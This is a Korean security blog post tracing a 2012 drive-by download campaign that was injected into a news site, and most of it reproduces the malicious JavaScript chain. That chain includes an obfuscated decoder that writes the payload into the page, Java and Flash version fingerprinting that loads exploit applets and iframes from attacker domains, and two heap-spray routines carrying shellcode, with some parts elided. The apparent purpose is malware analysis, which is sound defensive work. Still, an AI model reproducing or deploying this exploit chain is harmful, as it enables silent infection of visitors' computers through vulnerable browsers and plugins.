최초 감염 페이지 : http://inews24.cox/js_lib/slide_new.js
http://lzxvx.com/pix/rot.html
http://lzxvx.com/pix/ll.html
~>최종 파일 : http://oppo.ltevc.com/csx/8191i.css
~> <iframe src=nBQVd.html>
~> 최종파일 : http://oppo.ltevc.com/csx/8191i.css
~> <iframe src=utEWY.html>
~> 최종파일 : http://oppo.ltevc.com/csx/8191i.css
http://lzxvx.com/pix/swfobject.js
http://lzxvx.com/pix/jpg.js
var Yszz1="%59"+"%73"+"%7A"+"%7A"+"%30"+"%30";var Yszz2="%78"+"%78"+"%6F"+"%6F"+"%78"+"%78";var Yszz3="%30"+"%30";var pkucde =Yszz1+Yszz2+Yszz3,AVgHbu2f=unescape,cu1l2lp3s2z="WdQOuGkE6OzRFoogdm06G5/
ZwORxIFg6MUdLmoM5TsOjunE3gpAu2UamKTbHI579p8YjKzukIY0iiGPnAzuoELwFCBvivDq
Vsp0xEJqsYhv4fmgbTn+l6gS/ZSmfWq7bYYj75F4qDqKDCzsDYf4SUhxtoWikabVa5kxYA61CR
qLyfN4lvEaSErH/pSIFZzVo8h0GQicb2PyxrigX6tUz4e8idBmR9NmHu997aWdIhxnSIhFG7+M+C
WV38iEKKUoOpWsHLNYR408rdFKuBRLVB9mqfzoO/A9Ov5p6WH2GKnXUhZ8p1lKnIAhbrZLrzI
+b5dk84M2M1S118FCy0GHhhq6MDnc3Q2yxcvukLdHaW3kkmd2u+1ZWAvZ0IpXSPAmI6vrv4dy
eq88RSCzeWTubmBD9MFlnEisRNIp/FuGWxDo9EbnmXp6uClXdRfwTgU5iraHQKcZU0ax43fE
Z4FRRdGAk1N66BNBGy8h6iYdsTcOBIJEKWpRWGuwc/4d9CRMnb9p8FOSFgQB+cet/8v4Z6
Eqd9lg9ARlEPRfn/XDfp+QbkH3R3A8JTUZlZ5h4p/qC4WLVHr2AmrA2S3/L4A07CmltBEBCmq
+Spg2Y9yRMZBYr3ZHxryCvJ3aI5CXm79TrJnrf+spRlidyzGSHFPTceqTqnozmJWRhn0sBT3eh
/PM/5cu0EH5gyUCeeJAstulZwOXCA9zrtHmB1KKP//LWZhHZHZx4LSR9swW/U4xCghmBiQO
//qbbXPD+PAkKnb/5j5qT5EjtrD/z+[중략]
/wBrtEEWSiNuj1SdT3xzOTTaM2Di0TPIiXdZ0BPFlDaSYWgxYFVmntCd1D8A9idlpJcQfWH1YK30ve
YjWcwRpgGapbfUUYx0KOdPU/5+Di4brvdJSlwemIjIe2kphz/91BznRNjmkjLLwtrxcJzmDT1NZSQtb
EGAZi3lK+u6YzEXBU9ORYn8kOK1S5uWZfGf7OHXmE6iNUVMYnSl/EVsNR1zVSgNqVcxzFDsMk
Aq6BY61q8tYX2sCfmc+hOOZ+TWM6rOBHvQ5KQBT+JKChWM0ehMxTK2kMNzCNFimMMuXRcw
euE+8Qib7AVU5S3dadoHXmTgMCGQNQxeLHqHY6/yUSShom1BNfHtDbOU3kvtsmejRQsqnRTjfv2
9L3lcWgbf1BupXZ3AUu0rn7Sil5NOavlnkP1acXwnhJZmpLPcPyc59p92nRB14cmtzyuQmy1tx0kZpM
gpQz3uf4IEBq2mouQl7LdEIlTJIngCkkxKkw2zoDx5ri0UxhHj6KqOSHO+lP59zry40nfG3WnO+cpJGGj
xczB4DNgvSG9NCKO9EnYY4fT8Fhc9rfY6DM26vldSdPJY5eOnVNTjIRrijSlbDSgLS9OBTt5A==",MxAAS="%64"+"%6f"+"%63"+"%75"+"%6d"+"%65"+"%6e"+"%74",UAXzqa1="%77"+"%72"+"%69"+"%74"+"%65",Kxllz1z;function Yszz_v1(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
return out.join('');}
var kaixindecodeChars=new Array(-1,-1,-1,-1,-1,-1,[중략],1,-1);
MxAAS=AVgHbu2f(MxAAS);
function kaixindecode(str)
{var c1,c2,c3,c4;/*Yszz 0.3*/var i,len,out;len=str.length;i=0;out = "";while(i<len)
{do
{c1=kaixindecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)
break;do
{c2=kaixindecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)
break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do
{c3=str.charCodeAt(i++)&0xff;if(c3==61)
return out;c3=kaixindecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)
break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do
{c4=str.charCodeAt(i++)&0xff;if(c4==61)
return out;c4=kaixindecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)
break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}
return out}
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
{v[i]=String.fromCharCode(v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
if(w){return v.join('').substring(0,sl);}
else{return v.join('');}}
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
return v;}
Kxllz1z=AVgHbu2f(pkucde);
function kaixin(str,Udkz){if(str==""){return"";}
var v=str2long(str,false);var k=str2long(Udkz,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
UAXzqa1=AVgHbu2f(UAXzqa1);
Dz=cu1l2lp3s2z;
Dz=Yszz_v1(kaixin(kaixindecode(Dz), Kxllz1z));window[MxAAS][UAXzqa1] (Dz);
var RWkTTC8=navigator.userAgent.toLowerCase();
if(document.cookie.indexOf("Udz1szV=")==-1 && RWkTTC8.indexOf("bot")==-1 && RWkTTC8.indexOf("spider")==-1 && RWkTTC8.indexOf("linux")==-1)
{
var jHiJb2=deconcept.SWFObjectUtil.getPlayerVersion();
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="Udz1szV=Yes;path=/;expires="+expires.toGMTString();
var kaixiny=document.createElement('body');
document.body.appendChild(kaixiny);
var kaixinm=deployJava.getJREs()+"";
kaixinm=parseInt(kaixinm.replace(/\.|\_/g,''));
if (kaixinm<=17002)
{
var kaixin=document.createElement('applet');
kaixin.width="1";
kaixin.height="1";
if((kaixinm<=16027 && kaixinm>=16000) || (kaixinm>=15000 && kaixinm<=15031))
{
kaixin.archive="WHXgJTUj.jpg";
kaixin.code="GondadGondadExp.class";
kaixin.setAttribute("data","http://oppo.ltevc.com/csx/8191i.css");
document.body.appendChild(kaixin);
}
else if ((kaixinm<=17002 && kaixinm>=17000) || (kaixinm<=16030 && kaixinm>=16000) ||(kaixinm>=15033 && kaixinm<=15000))
{
kaixin.archive="pvAjohpE.jpg";
kaixin.code="GondadExp.Ohno.class";
kaixin.setAttribute("xiaomaolv","http://oppo.ltevc.com/css/8191i.css");
kaixin.setAttribute("bn","woyouyizhixiaomaolv");
kaixin.setAttribute("si","conglaiyebuqi");
kaixin.setAttribute("bs","748");
document.body.appendChild(kaixin);
}
}
else {
var pcss=navigator.userAgent.toLowerCase();
var UaYcKzD2 = window.navigator.userAgent.toLowerCase();
var kxkx=deconcept["SWFOb"+"jectU"+"til"]["getPlay"+"erVer"+"sion"]();
if(((kxkx['major']==10&&kxkx['minor']<=3)&&kxkx['rev']<=183||(kxkx['major']==11&&kxkx['minor']<=1&&kxkx['rev']<=102&&((pcss.indexOf('msie 6.0')>0)||(pcss.indexOf('msie 7.0')>0)||(pcss.indexOf('msie')==-1)))))
{
document.writeln("<iframe src=nBQVd.html><\/iframe>");
}
else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1))
{
document.writeln("<iframe src=utEWY.html><\/iframe>");
}
else
{
if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1))
{
document.writeln("<iframe src=N9TtW.html><\/iframe>");
}
}
}
}
<iframe src=utEWY.html>
<script>
function heapLib() {
}
heapLib.ie = function(maxAlloc, heapBase) {
this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
this.heapBase = (heapBase ? heapBase : 0x150000);
this.paddingStr = "AA"+"AA";
while (4 + this.paddingStr.length*2 + 2 < this.maxAlloc) {
this.paddingStr += this.paddingStr;
}
this.mem = new Array();
this.flushOleaut32();
}
heapLib.ie.prototype.debug = function(msg) {
void(Math.atan2(0xbabe, msg));
}
heapLib.ie.prototype.debugHeap = function(enable) {
if (enable == true)
void(Math.atan(0xbabe));
else
void(Math.asin(0xbabe));
}
heapLib.ie.prototype.debugBreak = function(msg) {
void(Math.acos(0xbabe));
}
heapLib.ie.prototype.padding = function(len) {
if (len > this.paddingStr.length)
throw "Requested padding string length " + len + ", only " + this.paddingStr.length + " available";
return this.paddingStr.substr(0, len);
}
heapLib.ie.prototype.round = function(num, round) {
if (round == 0)
throw "Round argument cannot be 0";
return parseInt((num + (round-1)) / round) * round;
}
heapLib.ie.prototype.hex = function(num, width)
{
var digits = "0123456789ABCDEF";
var hex = digits.substr(num & 0xF, 1);
while (num > 0xF) {
num = num >>> 4;
hex = digits.substr(num & 0xF, 1) + hex;
}
var width = (width ? width : 0);
while (hex.le...%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA
%u1441%u108A%uFA7A%u2[중략]%uBDBD%uBDBD"+"%uEAEA%uEAEA
%uEAEA%uEAEA");
var nops = unescape("%u0c0c%u0c0c");
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, 0x800 - code.length);
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=1; i < 0xa70; i++)
{
heap_obj.alloc(block);
}
<iframe src=nBQVd.html>
var rcho6 =cWiDmn8+'oxzz5858oxzz5858oxzz10EBoxzz4B5BoxzzC933oxzzB966oxzz03B8
oxzz3480oxzzBD0BoxzzFAE2oxzz05EBoxzzEBE8oxzzFFFFoxzz54FFoxzzBEA3oxzzBDBD
oxzzD9E2oxzz8D1Cox[중략]oxzzEAEA';
var NyzohAW2="d";
var APgm7 = VHbfXE5(rcho6.replace(/oxzz/g,csbcST4));
var kAtq4 = new Array()
var SPur3 = 0x100000 - (APgm7.length*2 + 0x24 + 0x1000);
var rbSO2 = "vglQ60d0"+"dvglQ60d0"+"d";
var mWXJ4 = VHbfXE5(rbSO2.replace(/vglQ6/g,csbcST4));
try{alert(a,b,c);}
catch(e)
{
var Vbfgj1="d";
while(mWXJ4.length < SPur3) mWXJ4 +=mWXJ4;
var iRre8 = mWXJ4.substring(0, SPur3/2);
delete mWXJ4;
for(i=0;i<300;i++)
{
kAtq4[i] = [iRre8+APgm7].join("");
}
}
function LFydVC8()
{
document.write("<embed src='KR3ZE.swf' width=10 height=0></embed>");
}
NyzohAW2="h";
document.getElementById("WFGGY8").onclick();
inews24.com 삽입 스크립트 : inews24.com 내에 공백을 이용한 악성 스크립트 살펴보기 !
'security > 악성코드 유포' 카테고리의 다른 글
| 인제대학교 일어일문학과 http://homepage.inje.ac.kr/~japan/xe/index.php?mid=main 악성 코드 유포중 ! (0) | 2012.08.25 |
|---|---|
| [JS/Obfuscated.HN] http://insaweb9.cafe24.com/bbs/login.php?id=best 악성 스크립트 유포 정리 ! (0) | 2012.08.11 |
| inews24.com 내에 공백을 이용한 악성 스크립트 살펴보기 ! (0) | 2012.06.29 |
| 오랜만에 풀어본 난독화 스크립트! (0) | 2012.06.29 |
| Hex 코드로 위장하여 악성 Iframe이 삽입된 http://www.jeonju1318.or.kr (0) | 2012.06.03 |